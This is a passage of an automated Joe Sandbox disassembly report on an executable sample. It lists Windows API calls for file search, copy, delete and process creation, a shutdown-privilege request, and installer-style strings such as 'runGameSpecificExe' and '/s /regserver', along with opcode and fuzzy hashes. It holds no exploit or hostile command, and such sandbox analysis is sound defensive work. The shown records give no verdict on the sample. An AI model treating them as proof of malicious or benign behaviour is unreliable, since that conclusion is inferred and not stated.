                                                                                                                        • Opcode Fuzzy Hash: 821cd59cc18272ed3796e4f433aba563b08464d2ee76fcfaa3ea73945a435167
                                                                                                                        • Instruction Fuzzy Hash: B7D012F0C483159BEBE88B00DC457A97239EB40710F2041FAD50E66390DB341EC5CE57
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: 167854a99600fa0e99dd71a3bcf69e92131ec6f4da5e2abf3ce424393fbf3d87
                                                                                                                        • Instruction ID: 49a8e1bd9c86ad356a55df1ae2979953c7749a54d733bd57f9585beca62ad5fb
                                                                                                                        • Opcode Fuzzy Hash: 167854a99600fa0e99dd71a3bcf69e92131ec6f4da5e2abf3ce424393fbf3d87
                                                                                                                        • Instruction Fuzzy Hash: BAD017B08083149BEBE88B00CC85BA9B339AB44710F2041EDA20E22690DB742EC4CF16
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: f8c83ce0659933d12c25224a73ff6f80cd7f86ca7789c9273cdc97401311b0bd
                                                                                                                        • Instruction ID: a6e3e7d99a38821e76979d747b758569e49a17766073ac88e5f09d68a5376ae8
                                                                                                                        • Opcode Fuzzy Hash: f8c83ce0659933d12c25224a73ff6f80cd7f86ca7789c9273cdc97401311b0bd
                                                                                                                        • Instruction Fuzzy Hash: 95D0C934E487688BCBE4DB00C8857E8B739EB95712F2082E6909E66260DF701EC6CF01
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: 1dc31577b986d824ade95fff7c23ca0874cd8e7894de531ceb1573817e2cca04
                                                                                                                        • Instruction ID: 713af2a74f578950d3ef6b9bcb030b6e7d225ccb29fc3f0653117ab54aca20c7
                                                                                                                        • Opcode Fuzzy Hash: 1dc31577b986d824ade95fff7c23ca0874cd8e7894de531ceb1573817e2cca04
                                                                                                                        • Instruction Fuzzy Hash: 38D0E974D083298BDBE89B00D8957D8B735AB44711F1440E9D54E66390DF701EC4CF06
                                                                                                                        APIs
                                                                                                                        • ImpersonateSelf.ADVAPI32(00000002,?,?), ref: 00413967
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00413974
                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?), ref: 0041397B
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 00413985
                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 0041399C
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?), ref: 004139A3
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004139C8
                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000014,?,?), ref: 004139DA
                                                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,?), ref: 004139F0
                                                                                                                        • GetLengthSid.ADVAPI32(?,?,?), ref: 00413A02
                                                                                                                        • LocalAlloc.KERNEL32(00000040,-00000010,?,?), ref: 00413A13
                                                                                                                        • InitializeAcl.ADVAPI32(00000000,-00000010,00000002,?,?), ref: 00413A2A
                                                                                                                        • AddAccessAllowedAce.ADVAPI32(00000000,00000002,00000003,?,?,?), ref: 00413A48
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,?), ref: 00413A60
                                                                                                                        • SetSecurityDescriptorGroup.ADVAPI32(00000000,?,00000000,?,?), ref: 00413A75
                                                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000,?,?), ref: 00413A82
                                                                                                                        • IsValidSecurityDescriptor.ADVAPI32(00000000,?,?), ref: 00413A89
                                                                                                                        • AccessCheck.ADVAPI32(00000000,?,00000001,?,?,00000014,?,?,?,?), ref: 00413AC8
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 00413AD2
                                                                                                                        Strings
                                                                                                                        • AccessCheck() failed with error %lu, xrefs: 00413AD9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DescriptorSecurity$Initialize$AccessAllocCurrentErrorLastLocalOpenProcessThreadToken$AllocateAllowedCheckDaclGroupImpersonateLengthOwnerSelfValid
                                                                                                                        • String ID: AccessCheck() failed with error %lu
                                                                                                                        • API String ID: 1643233394-3122912231
                                                                                                                        • Opcode ID: 15af52b6dc6585a8aaa5b1198cb4af8417f1577e0f23ce853e5bded0e1c0e001
                                                                                                                        • Instruction ID: 6636ee4da2cd74bfd359609ec80115f8e5afcf80bc05880448599f8d891f14b3
                                                                                                                        • Opcode Fuzzy Hash: 15af52b6dc6585a8aaa5b1198cb4af8417f1577e0f23ce853e5bded0e1c0e001
                                                                                                                        • Instruction Fuzzy Hash: 4D515E75A00208ABEB10DFE5DC89FEFBBB8AF46741F044029F605A6280D7B949458B66
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00409FA9
                                                                                                                        • GetFileAttributesA.KERNEL32(?), ref: 0040A018
                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040A02A
                                                                                                                          • Part of subcall function 00414A00: FindFirstFileA.KERNEL32(?,?,?,?,00000000), ref: 00414A1D
                                                                                                                          • Part of subcall function 00414A00: FindClose.KERNEL32(00000000), ref: 00414A39
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040A047
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040A056
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0040A0C5
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040A1B8
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040A1C7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirst$AttributesNext
                                                                                                                        • String ID: %s\%s$%s\*_inst.exe$Copy %s->%s$Exit runGameSpecificExe$Looking for %s$exec: %s with commandline '%s'$runGameSpecificExe
                                                                                                                        • API String ID: 4025586506-1506763675
                                                                                                                        • Opcode ID: e2e9ab5ccb90d6f9dd843bbe4941d007a6a10c0c1eed867c47787b405c742b8f
                                                                                                                        • Instruction ID: d2b54da0a6a615d98c4bb7f4e3ad910886c78d04fea921c7db62d1ad87df31e2
                                                                                                                        • Opcode Fuzzy Hash: e2e9ab5ccb90d6f9dd843bbe4941d007a6a10c0c1eed867c47787b405c742b8f
                                                                                                                        • Instruction Fuzzy Hash: D7A1D8B2108344ABD724DF60CC45FEB73ACEB84704F44492EB98957181DB79A74DCB6A
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000), ref: 004151FB
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00415213
                                                                                                                        • GetFileAttributesA.KERNEL32(?), ref: 0041521E
                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00415232
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0041523A
                                                                                                                        • CopyFileA.KERNEL32(?,?,?), ref: 0041524E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesFind$CloseCopyErrorFirstLast
                                                                                                                        • String ID: "%s"$/s /regserver$MyCopyFile$dll$exe$exec: %s /s %s$exec: %s /s /regserver %s$ocx
                                                                                                                        • API String ID: 3483889725-3576774900
                                                                                                                        • Opcode ID: e506baffcbc136c6131d4a1c8671d6fc93e4fe8248ca6c74d0802763e75e9641
                                                                                                                        • Instruction ID: 60f35962d690970186fbe8e082cbe82d24c67d20d37591994032dbb9b5c60f80
                                                                                                                        • Opcode Fuzzy Hash: e506baffcbc136c6131d4a1c8671d6fc93e4fe8248ca6c74d0802763e75e9641
                                                                                                                        • Instruction Fuzzy Hash: C5A14871508740BBE320DB60CC45FEB77A8ABC9705F04465EFE8957282DB789984CB6E
                                                                                                                        APIs
                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000400,?,?,?,?,?,0040B0FB,?,?,?,00000000,00000001,?,?,ask For CD - working dir,00000000), ref: 00413E61
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,?,0040B0FB,?,?,?,00000000,00000001,?,?,ask For CD - working dir,00000000,00404385), ref: 00413E88
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,?,0040B0FB,?,?,?,00000000,00000001,?,?,ask For CD - working dir,00000000,00404385), ref: 00413EA4
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00413EB8
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00414023
                                                                                                                        • CreateProcessA.KERNEL32(?,?,00000000,00000000,00000000,00000030,00000000,00000000,0045E440,0045E484,?,?,00000000), ref: 0041405B
                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 0041407C
                                                                                                                        • Sleep.KERNEL32(00000001,?,?,00000000), ref: 00414098
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000000), ref: 004140DD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory$FindProcess$CloseCodeCreateErrorExitFileFirstLastSleep
                                                                                                                        • String ID: "%s"$CreateProcess$Error executing '%s'%s$Exec And Wait
                                                                                                                        • API String ID: 3676699910-1096974953
                                                                                                                        • Opcode ID: 47fab39d792b6b31dfce4871978132716f4f91e3c138206beb0a83e96ad15d9d
                                                                                                                        • Instruction ID: 0d36562a55edf719c25e91f2d3ffa3eb5e978c8fbce3c5ea020dbcf3caa10d05
                                                                                                                        • Opcode Fuzzy Hash: 47fab39d792b6b31dfce4871978132716f4f91e3c138206beb0a83e96ad15d9d
                                                                                                                        • Instruction Fuzzy Hash: 8081E271248341ABD320DF60DC45FEBB7A8EBC5B01F10491EFA8497280DBB99985CB5B
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000000), ref: 00414A1D
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00414A39
                                                                                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?), ref: 00414B6C
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00414C0C
                                                                                                                        • GetFileAttributesA.KERNEL32(?), ref: 00414C16
                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00414C2A
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00414C31
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesFindSleep$CloseDeleteFirst
                                                                                                                        • String ID: "%s"$/s /UnregServer$/u /s$Remove$dll$exe$exec: %s /s /UnregServer %s$exec: %s /u /s %s$ocx
                                                                                                                        • API String ID: 207913334-4138445747
                                                                                                                        • Opcode ID: 7a27dd3ebb5889da30f2015b03362f2696fb5ccc79fbbb6d7542e5a1d3043de9
                                                                                                                        • Instruction ID: 569dca1f961776a68051f51d760419570266c25ba139ecdaab2e0422a95345d3
                                                                                                                        • Opcode Fuzzy Hash: 7a27dd3ebb5889da30f2015b03362f2696fb5ccc79fbbb6d7542e5a1d3043de9
                                                                                                                        • Instruction Fuzzy Hash: 345159B12843446BE224EB558C42FEB339CAFD5704F44491EFA88931C2EF7C954987AE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Chinese (Simplified)$Chinese (Traditional)$Czech$Danish$Dutch$English UK$English US$Finnish$French$German$Greek$Hebrew$Hungarian$Italian$Japanese$Korean$PortBrzl$Russian$Spanish$Swedish
                                                                                                                        • API String ID: 0-733503574
                                                                                                                        • Opcode ID: 19592bc6a5c2498cad33296640bab84ca89f9eba67d5babf45a1c1a8358e98fb
                                                                                                                        • Instruction ID: 37a5b3b5c5b6eab396eacb203a264361d5579e56741c889a3fa2050163f780a9
                                                                                                                        • Opcode Fuzzy Hash: 19592bc6a5c2498cad33296640bab84ca89f9eba67d5babf45a1c1a8358e98fb
                                                                                                                        • Instruction Fuzzy Hash: 5981481B3125C08AD769877554602BB7FA2ABAB344B1DC0BFC4886B3A2FE654C47C30D
                                                                                                                        APIs
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040A1B8
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040A1C7
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0040A1F6
                                                                                                                        • Sleep.KERNEL32(00000064,?,?,?,00000000,00000001), ref: 0040A2E1
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040A2EF
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040A2FB
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040A30A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseNext$DeleteFirstSleep
                                                                                                                        • String ID: %s\%s$%s\*_inst.exe$Copy %s->%s$Exit runGameSpecificExe$exec: %s with commandline '%s'$runGameSpecificExe
                                                                                                                        • API String ID: 2815766398-138872489
                                                                                                                        • Opcode ID: d6e4ad2af80b425a7b5d657036ccc8314ae48001f7a7774f849bb95704826abf
                                                                                                                        • Instruction ID: 0c91d48e411e499a262bfaaa4cfdbc113dac507737b5f6b4774de972c7e6e324
                                                                                                                        • Opcode Fuzzy Hash: d6e4ad2af80b425a7b5d657036ccc8314ae48001f7a7774f849bb95704826abf
                                                                                                                        • Instruction Fuzzy Hash: 5261F872108340ABE720DF60CC45FEB73A8EBC4704F44492EB98957181DB79A609CBAA
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                          • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                          • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                          • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                          • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                          • Part of subcall function 00414930: LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004149A7
                                                                                                                          • Part of subcall function 00414930: GetProcAddress.KERNEL32(00000000,CopyFileExA), ref: 004149BC
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00417F1B
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00417F97
                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00417FA7
                                                                                                                        • FindClose.KERNEL32(?), ref: 00417FBA
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00417FEA
                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0041807D
                                                                                                                        • FindClose.KERNEL32(?), ref: 00418090
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 004180B9
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0041813E
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00418149
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext$AddressDirectoryLibraryLoadProc$DeletePathSystemTempWindows
                                                                                                                        • String ID: %s\%s$%s\*_uninst.exe
                                                                                                                        • API String ID: 1160109514-2858441004
                                                                                                                        • Opcode ID: 8b4f70c65e56db4e043e312d9d4a1811d1f1b2102490617a729a834f26467973
                                                                                                                        • Instruction ID: 9f6682103830e505521cd8484b6fe5b054a565d779c716c41cdb5f6c531036c0
                                                                                                                        • Opcode Fuzzy Hash: 8b4f70c65e56db4e043e312d9d4a1811d1f1b2102490617a729a834f26467973
                                                                                                                        • Instruction Fuzzy Hash: 5681A6B21083445BD324DF60CD45BEBB7ACEBC8714F444D1EF99583181EB789649CBAA
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414422
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0041443A
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414494
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 004144AC
                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 004144BD
                                                                                                                        • RemoveDirectoryA.KERNEL32(?), ref: 004144D6
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414552
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0041456A
                                                                                                                        • RemoveDirectoryA.KERNEL32(0000005C), ref: 00414585
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00414594
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseDirectoryFileFirst$Remove$CreateSleep
                                                                                                                        • String ID: \
                                                                                                                        • API String ID: 593529018-2967466578
                                                                                                                        • Opcode ID: cd2a44f3d599598c1fafc9b4c5718adc1c77347e8a239c6df6d9f0cf34f94548
                                                                                                                        • Instruction ID: 0fb53b54470e76bddbd086c82c8af96ee8b09f8716e29362b9a934bf63ba6167
                                                                                                                        • Opcode Fuzzy Hash: cd2a44f3d599598c1fafc9b4c5718adc1c77347e8a239c6df6d9f0cf34f94548
                                                                                                                        • Instruction Fuzzy Hash: 686128352083859FC321CF28D8447EBBBD6ABD6354F084A5DE8D483351DA39D94DCB5A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @J2G$L$L$NJC7$W$a$a$b$d$i$o$r$r$y
                                                                                                                        • API String ID: 0-3995663177
                                                                                                                        • Opcode ID: c44c9c7f934dba0bbc222d2348a9d9c1558ab797c5b79ce742761f6feebedeb4
                                                                                                                        • Instruction ID: 252a6d8ed46e94f7374cf00b11fef3c12c06f11e1c1bd39a3460dd2fa65f4b0d
                                                                                                                        • Opcode Fuzzy Hash: c44c9c7f934dba0bbc222d2348a9d9c1558ab797c5b79ce742761f6feebedeb4
                                                                                                                        • Instruction Fuzzy Hash: 849133A1D142948AF7258B24EC597EB7675EF91300F0440FED44AAB381E27E1F91CB2B
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414CC8
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 00414DDE
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00414DED
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414E00
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$First$CloseNext
                                                                                                                        • String ID: *.*$\$\*.*
                                                                                                                        • API String ID: 2001080981-2301768657
                                                                                                                        • Opcode ID: 18643ff7272ddd118860804886334b36c9c05837dbd6501abf4df85ba6bf9773
                                                                                                                        • Instruction ID: a8a72605bd69f8ac0c64504b566f5f70f8f2b3987ac3faeae44afcbdd81da1c4
                                                                                                                        • Opcode Fuzzy Hash: 18643ff7272ddd118860804886334b36c9c05837dbd6501abf4df85ba6bf9773
                                                                                                                        • Instruction Fuzzy Hash: 707139711087854BD721CB24A8187FBB7D9EFC2305F14492AEDC597341EB38988A87AA
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00413853
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0041385A
                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00413874
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 004138B4
                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 004138BE
                                                                                                                        • GetLastError.KERNEL32(00000400,00000000,00000000,00000000), ref: 004138D4
                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 004138E2
                                                                                                                        • LocalFree.KERNEL32(?,?,SHUTDOWN FAILED,00000000), ref: 004138FF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AdjustCurrentErrorExitFormatFreeLastLocalLookupMessageOpenPrivilegePrivilegesValueWindows
                                                                                                                        • String ID: SHUTDOWN FAILED$SeShutdownPrivilege
                                                                                                                        • API String ID: 2448987565-1691336667
                                                                                                                        • Opcode ID: 00f76c3729a2cacb1a0f8653399a7fbaee5448bb748c007c2ebe38eae4308d50
                                                                                                                        • Instruction ID: 07b04e0414a2500c08cba524246ac508bc9e29567ebddda6aac245e4067d3e71
                                                                                                                        • Opcode Fuzzy Hash: 00f76c3729a2cacb1a0f8653399a7fbaee5448bb748c007c2ebe38eae4308d50
                                                                                                                        • Instruction Fuzzy Hash: 4E112EB4248300BBE310DF90DC4AF6BBBA8AB89B42F11451DFA45D61D1DBB495448B2A
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00414F30: FindFirstFileA.KERNEL32(?,?,?,?), ref: 00414F47
                                                                                                                          • Part of subcall function 00414F30: FindClose.KERNEL32(00000000), ref: 00414F81
                                                                                                                        • FindFirstFileA.KERNEL32(?,0040F4C0,?,00000000,?,?,00000000,00000000,?,?,0000005C,00000000), ref: 00415714
                                                                                                                          • Part of subcall function 00426C69: DeleteFileA.KERNEL32(?,0041900D,?,?,%s\filelist.txt,?,?), ref: 00426C6D
                                                                                                                          • Part of subcall function 00426C69: GetLastError.KERNEL32 ref: 00426C77
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$First$CloseDeleteErrorLast
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 3118232422-438819550
                                                                                                                        • Opcode ID: 56d7cd1762512bf9ae3bf9e88e6d90c3cb8513fa3674023f66d597dc73aeefa7
                                                                                                                        • Instruction ID: cbf47a1fe9aaabdb544cd48c2d0f09c466b47d1d9ba07135cc4e04564ba086e3
                                                                                                                        • Opcode Fuzzy Hash: 56d7cd1762512bf9ae3bf9e88e6d90c3cb8513fa3674023f66d597dc73aeefa7
                                                                                                                        • Instruction Fuzzy Hash: 47F14D3120CB86CBC721CB288864BFBB7D5AFD6344F544A6DE8C987341EB359849C796
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,0040F4C0,?,00000000,?,?,00000000,00000000,?,?,0000005C,00000000), ref: 00415714
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindFirst
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1974802433-438819550
                                                                                                                        • Opcode ID: 54f61200abbc225797f1c0ce2760cdaf0bd9c0ffbedeba8a52273200a21410e9
                                                                                                                        • Instruction ID: 1877e94ef0ce8ff5fbf0691ca38f6eac6a25572973ee1466535c20e71dfeb6f4
                                                                                                                        • Opcode Fuzzy Hash: 54f61200abbc225797f1c0ce2760cdaf0bd9c0ffbedeba8a52273200a21410e9
                                                                                                                        • Instruction Fuzzy Hash: 34C10931208B86CBC721CB2484647FBB7E5BFD6345F58496EE8C683301EB35984AC796
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,?,?), ref: 00414684
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 004146D5
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0041472B
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0041478D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$First$CloseNext
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 2001080981-438819550
                                                                                                                        • Opcode ID: cd8b76d4ab3ece41a87f241e506bef1def962168270d0846ba8206e87e42ead1
                                                                                                                        • Instruction ID: d464e212dd68eb2a0debe0c153d34ad098e3c75a0d726ec831b8764db62cd133
